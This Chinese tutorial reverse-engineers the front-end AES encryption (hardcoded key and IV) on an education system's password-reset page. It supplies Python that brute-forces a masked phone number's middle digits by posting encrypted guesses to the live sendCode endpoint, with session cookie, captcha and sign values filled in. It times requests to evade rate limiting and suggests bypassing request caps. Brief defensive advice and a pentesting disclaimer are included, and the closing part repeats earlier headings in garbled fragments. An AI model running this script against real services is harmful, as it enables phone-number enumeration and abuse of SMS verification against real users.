前端数据加密方式逆向分析教学文档<\/h1>

一、背景与目标<\/h2>
本教学文档基于对某教育系统密码重置功能中前端数据加密方式的逆向分析过程。目标是通过JavaScript逆向工程，理解其加密机制，并将其转换为Python实现，最终实现手机号爆破功能。<\/p>

二、加密发现<\/h2>

在密码重置页面，输入手机号发送验证码时，发现请求数据中的手机号字段被加密<\/li>
初步观察加密格式类似Base64，但直接解码失败<\/li>

加密字段名为

cellphone<\/code><\/li>
<\/ol>
三、加密分析过程<\/h2>
1. 定位加密代码<\/h3>
在浏览器开发者工具中分析JavaScript代码，发现关键加密代码位于：<\/p>
retrievePassword\/encrypt.js
<\/code><\/pre>
2. 加密流程分析<\/h3>
加密过程主要涉及以下方法：<\/p>

encryptAES()<\/code> - 主加密函数<\/li>
getAesString()<\/code> - AES加密核心函数<\/li>
randomString()<\/code> - 生成随机字符串<\/li>
<\/ul>
加密调用链<\/h4>
encryptAES() → getAesString() → randomString() → 最终加密输出
<\/code><\/pre>
3. 加密参数分析<\/h3>
通过断点调试，确定加密函数的三个关键参数：<\/p>


data参数<\/strong>:<\/p>

由两部分组成：

64位随机字符串（通过randomString()<\/code>生成）<\/li>
拼接实际手机号（用户输入）<\/li>
<\/ul>
<\/li>
示例格式："随机字符串86-138xxxx2909"<\/code><\/li>
<\/ul>
<\/li>

key0参数<\/strong>:<\/p>

AES密钥，固定值：'rjBFAaHsNkKAhpoi'<\/code><\/li>
编码为UTF-8格式<\/li>
<\/ul>
<\/li>

iv0参数<\/strong>:<\/p>

初始化向量，16位随机字符串（通过randomString()<\/code>生成）<\/li>
<\/ul>
<\/li>
<\/ol>
4. 加密细节<\/h3>

加密算法：AES-CBC模式<\/li>
使用PKCS7填充<\/li>
最终结果经过Base64编码<\/li>
<\/ul>
四、Python实现<\/h2>
1. 加密函数实现<\/h3>
from<\/span> base64 import<\/span> b64encode
<\/span><\/span>from<\/span> Crypto.Cipher import<\/span> AES
<\/span><\/span>from<\/span> Crypto.Util.Padding import<\/span> pad
<\/span><\/span>
<\/span><\/span>def<\/span> get_aes_string<\/span>(seq):
<\/span><\/span>    # 固定参数<\/span>
<\/span><\/span>    str64 =<\/span> "pSKzskzbmmrsbrWBeCNShHWPFS8kpwfn3NJenwcRp34wzmBm4RY8JmN3xcAC7Bnm"<\/span>
<\/span><\/span>    str16 =<\/span> "3RGekMFSj4zbyAKY"<\/span>.<\/span>encode('utf-8'<\/span>)
<\/span><\/span>    key =<\/span> 'rjBFAaHsNkKAhpoi'<\/span>.<\/span>encode('utf-8'<\/span>)
<\/span><\/span>    
<\/span><\/span>    # 构造加密数据：固定随机字符串 + 手机号<\/span>
<\/span><\/span>    data_with_random =<\/span> f<\/span>"<\/span>{<\/span>str64}<\/span>86-138<\/span>{<\/span>seq}<\/span>2909"<\/span>
<\/span><\/span>    
<\/span><\/span>    # AES加密<\/span>
<\/span><\/span>    cipher =<\/span> AES.<\/span>new(key, AES.<\/span>MODE_CBC, str16)
<\/span><\/span>    encrypted_data =<\/span> cipher.<\/span>encrypt(pad(data_with_random.<\/span>encode('utf-8'<\/span>), AES.<\/span>block_size))
<\/span><\/span>    
<\/span><\/span>    # Base64编码<\/span>
<\/span><\/span>    return<\/span> b64encode(encrypted_data).<\/span>decode('utf-8'<\/span>)
<\/span><\/span><\/code><\/pre>2. 手机号爆破实现<\/h3>
import<\/span> time
<\/span><\/span>import<\/span> requests
<\/span><\/span>import<\/span> urllib3
<\/span><\/span>urllib3.<\/span>disable_warnings()
<\/span><\/span>
<\/span><\/span>def<\/span> generate_sequence<\/span>(start=<\/span>0<\/span>, end=<\/span>5<\/span>):
<\/span><\/span>    """生成4位手机号中间数字序列"""<\/span>
<\/span><\/span>    for<\/span> i in<\/span> range(start, end +<\/span> 1<\/span>):
<\/span><\/span>        yield<\/span> f<\/span>"<\/span>{<\/span>i:<\/span>04d<\/span>}<\/span>"<\/span>
<\/span><\/span>
<\/span><\/span>headers =<\/span> {
<\/span><\/span>    'authority'<\/span>: 'xxx.xxx.xxx.xxx'<\/span>,
<\/span><\/span>    'accept'<\/span>: 'application\/json'<\/span>,
<\/span><\/span>    'content-type'<\/span>: 'application\/json'<\/span>,
<\/span><\/span>    'cookie'<\/span>: 'route=7e11b4209903de33fa3ab7eeb3991bd8;'<\/span>,
<\/span><\/span>    'user-agent'<\/span>: 'Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/118.0.5993.90 Safari\/537.36'<\/span>,
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>json_data =<\/span> {
<\/span><\/span>    'accountId'<\/span>: ''<\/span>,
<\/span><\/span>    'loginNo'<\/span>: 'xxxxxxxx'<\/span>,
<\/span><\/span>    'cellphone'<\/span>: ''<\/span>,  # 动态填充<\/span>
<\/span><\/span>    'email'<\/span>: ''<\/span>,
<\/span><\/span>    'hideCellphone'<\/span>: '138****2909'<\/span>,
<\/span><\/span>    'hideEmail'<\/span>: ''<\/span>,
<\/span><\/span>    'captchaId'<\/span>: '4861601744408988'<\/span>,
<\/span><\/span>    'captcha'<\/span>: 'goct'<\/span>,
<\/span><\/span>    'code'<\/span>: ''<\/span>,
<\/span><\/span>    'type'<\/span>: 'cellphone'<\/span>,
<\/span><\/span>    'password'<\/span>: ''<\/span>,
<\/span><\/span>    'confirmPassword'<\/span>: ''<\/span>,
<\/span><\/span>    'sign'<\/span>: 'ff07582f37e94776adf3224dcd517c5f'<\/span>,
<\/span><\/span>    'appealSign'<\/span>: '7f6ff627358b40e79aa21c2ea8da36d8'<\/span>,
<\/span><\/span>    'isAppealFlag'<\/span>: '0'<\/span>,
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>for<\/span> num_str in<\/span> generate_sequence():
<\/span><\/span>    print(f<\/span>"尝试手机号中间四位: <\/span>{<\/span>num_str}<\/span>"<\/span>)
<\/span><\/span>    cellphone =<\/span> get_aes_string(num_str)
<\/span><\/span>    json_data['cellphone'<\/span>] =<\/span> cellphone
<\/span><\/span>    
<\/span><\/span>    # 请求间隔5秒，避免触发防护<\/span>
<\/span><\/span>    time.<\/span>sleep(5<\/span>)
<\/span><\/span>    
<\/span><\/span>    response =<\/span> requests.<\/span>post(
<\/span><\/span>        'https:\/\/xxx.xxx.xxx.xxx\/sendCode'<\/span>,
<\/span><\/span>        headers=<\/span>headers,
<\/span><\/span>        json=<\/span>json_data,
<\/span><\/span>        verify=<\/span>False<\/span>,
<\/span><\/span>    )
<\/span><\/span>    print(response.<\/span>text)
<\/span><\/span><\/code><\/pre>3. 注意事项<\/h3>

请求限制<\/strong>：同一组参数请求5次后会报错，可能需要动态调整其他参数<\/li>
随机字符串<\/strong>：实际应用中应动态生成，本例为简化写死<\/li>
请求间隔<\/strong>：添加5秒间隔避免触发频率限制<\/li>
<\/ol>
五、总结与扩展<\/h2>


逆向技巧<\/strong>：<\/p>

通过浏览器开发者工具定位关键加密代码<\/li>
使用断点调试分析加密参数构成<\/li>
关注加密函数的调用链和数据流<\/li>
<\/ul>
<\/li>

加密分析<\/strong>：<\/p>

识别加密算法类型（AES-CBC）<\/li>
确定密钥和IV的生成方式<\/li>
理解数据拼接和编码过程<\/li>
<\/ul>
<\/li>

防护建议<\/strong>：<\/p>

增加动态密钥生成机制<\/li>
实现请求频率限制和验证码校验<\/li>
避免在前端暴露固定加密参数<\/li>
<\/ul>
<\/li>

扩展应用<\/strong>：<\/p>

类似方法可用于分析其他前端加密场景<\/li>
可结合自动化工具实现更高效的爆破<\/li>
可研究如何绕过请求次数限制<\/li>
<\/ul>
<\/li>
<\/ol>
本教学完整展示了从前端加密发现到Python实现的完整逆向过程，适用于Web安全研究和合法渗透测试场景。<\/p>

前端数据加密方式逆向分析教学文档<\/h1>

一、背景与目标<\/h2> 本教学文档基于对某教育系统密码重置功能中前端数据加密方式的逆向分析过程。目标是通过JavaScript逆向工程，理解其加密机制，并将其转换为Python实现，最终实现手机号爆破功能。<\/p>

三、加密分析过程<\/h2>

四、Python实现<\/h2>

一、背景与目标<\/h2>
本教学文档基于对某教育系统密码重置功能中前端数据加密方式的逆向分析过程。目标是通过JavaScript逆向工程，理解其加密机制，并将其转换为Python实现，最终实现手机号爆破功能。<\/p>